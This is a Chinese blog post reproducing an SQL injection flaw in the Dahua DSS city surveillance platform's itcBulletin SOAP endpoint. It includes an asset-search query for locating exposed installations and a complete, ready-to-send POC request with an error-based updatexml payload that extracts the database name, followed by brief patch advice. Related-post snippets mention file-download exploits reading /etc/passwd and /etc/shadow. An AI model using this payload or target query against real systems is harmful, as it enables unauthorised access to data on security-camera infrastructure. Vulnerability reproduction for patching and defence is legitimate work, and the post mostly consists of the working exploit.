大华 DSS 城市安防数字监控系统 SQL 注入漏洞

最新推荐文章于 2024-05-29 10:47:58 发布
最新推荐文章于 2024-05-29 10:47:58 发布
阅读量1.3k 收藏 7
点赞数 9
分类专栏: 漏洞复现 文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/135123380
版权

漏洞简介

大华DSS数字监控系统itcBulletin接口对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,可通过注入漏洞获取数据库敏感信息。

资产测绘

app=“dahua-DSS”

在这里插入图片描述

漏洞复现

POC:

POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host:your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Length: 341
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
 (updatexml(1,concat(0x7e,(select database()),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

在这里插入图片描述

成功查询出当前数据库。

Sqlmap验证

在这里插入图片描述

修复建议

1.升级至应用最新版本
2.部署WAF防火墙进行防护。

keepb1ue
关注
  • 9
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】大华 DSS 数字监控系统 itcBulletin SQL 注入
失心少年
01-11 423
攻击者除了可以利用 SQL注入漏词获取数据库中的信息例如,管理员后台密码、站点的用户人人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限## 免责声明。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!
大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现
0xSec
12-16 998
大华 DSS存在SQL注入漏洞,攻击者/portal/services/itcBulletin 路由发送特殊构造的数据包,利用报错注入获取数据库敏感信息。攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
漏洞复现】大华DSS数字监控系统getAttList SQL注入漏洞
晚风不及你
03-05 592
大华DSS数字监控系统是一个在通用安防视频监控系统基础上设计开发的系统,除了具有普通安防视频监控系统的实时监视、云台操作、录像回放、报警处理、设备治理等功能外,更注重用户使用的便利性。
【复现】大华 DSS 数字监控系统 任意文件读取漏洞_38
fushuang333的博客
02-03 1209
【复现】大华 DSS 数字监控系统 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容。
大华城市安防监控系统平台管理存在任意文件下载漏洞
剁椒鱼头没剁椒的博客
02-14 2815
大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。刷新登录页面进行抓包,然后在数据包中添加POC。大华城市安防监控系统平台管理。
漏洞复现--大华城市安防系统平台任意文件下载(poc)
qq_53003652的博客
10-07 291
大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。用户密码存放在etc/shadow下,读取etc/shadow。点到为止,拿到密码后可以干什么懂得都懂,这里也是不演示了。成功读取etc/passwd。自行查询厂商发布补丁。
大华城市安防系统平台任意文件下载漏洞
CommputerMac的博客
10-06 614
大华城市安防监控系统平台是一款集视频、报警、存储、管理于一体的综合安防解决方案。该平台支持多种接入方式,包括网络视频、模拟视频、数字视频、IP电话、对讲机等。此外,该平台还支持多种报警方式,包括移动侦测、区域入侵、越线报警、人员聚集等。filePath=file:///etc/passwd,可下载文件。大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。关注微信公众号 网络安全透视镜 回复 20231007 获取检测利用脚本。
大华平台DSS视频监控系统介绍.doc
05-13
大华平台DSS视频监控系统介绍
大华DSS平台SDK(客户端demo_win32_win64).zip
06-23
大华DSS平台SDK(客户端demo_win32_win64) 大华DSS视频监控客户端开发的演示 demo。其中包含 实时预览,录像回放与下载,云台控制,报警,语音对讲,ftp 图片,电视墙等 功能模块。
DSS联网监控系统设计方案.pdf
05-16
DSS联网监控系统设计方案.pdfDSS联网监控系统设计方案.pdfDSS联网监控系统设计方案.pdfDSS联网监控系统设计方案.pdfDSS联网监控系统设计方案.pdf
数字监控系统DSS2.0(安装说明)
08-06
数字监控系统DSS2.0,管理的视频、移动巡查、车辆、重点设施等城管资源数据和现有应用系统,改造和完善现有的城管案件处置流程,将现有城市综合管理的巡查发现、投诉受理、协调督办、检查考评、设施监控、指挥调度等...
【复现】大华 DSS SQL 注入漏洞_46
fushuang333的博客
02-11 1770
【复现】大华 DSS SQL 注入漏洞,​攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
大华智慧园区综合管理平台 gis/soap/bitmap接口处任意文件上传漏洞
weixin_52204925的博客
02-01 940
大华智慧园区综合管理平台 gis/soap/bitmap接口处任意文件上传漏洞
PostgreSQL自带的命令行工具25- ecpg
lee_vincent1的博客
05-23 529
ecpg是 PostgreSQL 实现的嵌入式 SQL 编译器,它将带有嵌入式 SQL 的 C 代码转化为纯 C 代码,并生成可以直接调用 PostgreSQL API 的程序。通过ecpg,开发者可以在 C 程序中直接写 SQL 语句,提高了数据库操作的可读性和开发效率。ecpg是 PostgreSQL 提供的一个强大工具,允许开发者在 C 程序中嵌入 SQL 语句,从而简化了数据库访问逻辑,并提供类型安全和标准化的数据库接口。
海山数据库(He3DB)代理ProxySQL使用详解:(一)架构说明与安装
weixin_42744640的博客
05-23 723
后端的MySQL实例可根据用途配置到不同的hostgroup中,由ProxySQL基于7层网络协议,将来源于APP的流量路由到对应的hostgroup内,从而实现负载均衡或者读写分离。通常用于黑名单功能,即如果匹配该规则后,如果其error_msg不为空,则客户端的操作将会接受到error_msg设置的错误信息;transaction_persistent:表示是否持久化事务,设置为1表示开启一个事务后,该事务的所有操作均在同一个hostgroup中操作完成,其会忽略设置的任何查询规则;
【Text2SQL 经典模型】TypeSQL
VLyb
05-23 1038
借助于数据库的 table schema 检索和 knowledge graph 的检索,为 question 的每个 word 标注一个 type,从而提高 embedding 的效果当 database content 可用时,type 标注时还会进一步对 column content 做检索,并为其标注 column name,这样当用户的 question 中的所提到的列名或者条目不精确时,也可以通过这个步骤来对应到具体的数据库 column,从而提高效果,实现所谓的“内容敏感性。
SQL Server定期收缩日志文件详细步骤——基于SQL Server 2012
最新发布
lxcw_sir的博客
05-29 383
SQL Server定期收缩日志文件详细步骤——基于SQL Server 2012
PostgreSQL常用插件
PGCCC的博客
05-29 560
1.提供 PostgreSQL 实例的操作系统级别的资源使用情况,包括缓存命中率和磁盘 IO 等。通过使用这些插件,您可以大大增强 PostgreSQL 的功能,满足各种复杂的应用需求。1.提供三元组(trigram)相似度匹配和索引功能,常用于模糊搜索和文本相似度匹配。1.增加对地理空间数据的支持,使 PostgreSQL 成为一个功能强大的空间数据库。1.PostgreSQL 的过程语言,允许用户编写存储过程和触发器。1.基于逻辑复制的插件,提供更细粒度的数据复制控制和双向复制能力。
大华dss平台sdk
12-25
大华DSS平台SDK是大华公司提供的软件开发工具包,用于帮助开发者快速、高效地进行DSS平台的应用程序开发。该SDK包含了丰富的API和工具,可以帮助开发者实现视频监控、录像回放、远程操作等功能。 通过DSS平台SDK,开发者可以轻松地与大华的视频监控设备进行通信和交互,实现对设备的控制和管理。SDK还提供了丰富的图像处理和分析功能,可以帮助开发者开发出更加智能和高效的视频监控应用程序。 DSS平台SDK支持多种开发语言和平台,包括C/C++、Java、.NET等,可以在不同的操作系统和硬件平台上进行开发。这样就可以满足各种不同需求和环境下的应用开发需求。 另外,大华DSS平台SDK还提供了丰富的开发文档和示例代码,方便开发者学习和使用。开发者可以通过这些文档和示例快速上手,快速完成应用程序的开发和部署。 总之,大华DSS平台SDK是一款功能强大、易于使用的软件开发工具包,可以帮助开发者快速实现视频监控应用程序的开发和部署,提高开发效率,降低开发成本。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值